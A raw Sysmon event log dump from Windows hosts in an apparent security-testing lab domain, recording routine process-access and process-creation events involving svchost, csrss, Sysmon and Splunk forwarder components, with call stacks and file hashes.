12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291654Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291653Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291652Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-0277-6088-FD29-00000000BB01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291651Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0277-6088-FD29-00000000BB01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291650Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-0277-6088-FD29-00000000BB01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440584Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:23.207{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440583Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:23.207{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440589Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:24.370{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9D4C129F1A4969524554D21DFA36799,SHA256=DAB597A04B5D3D6AEAF2CCD4F5DCFB223E48404C4C6D1138DA92FFA46F25FE98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291692Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.805{BEA10069-0278-6088-FF29-00000000BB01}42767100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291691Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0278-6088-FF29-00000000BB01}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291690Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291689Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291688Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291687Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291686Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291685Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291684Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291683Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291682Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291681Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-0278-6088-FF29-00000000BB01}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291680Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.674{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0278-6088-FF29-00000000BB01}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291679Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.675{BEA10069-0278-6088-FF29-00000000BB01}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291678Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.126{BEA10069-0278-6088-FE29-00000000BB01}61722716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291677Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0278-6088-FE29-00000000BB01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291676Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291675Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291674Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291673Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 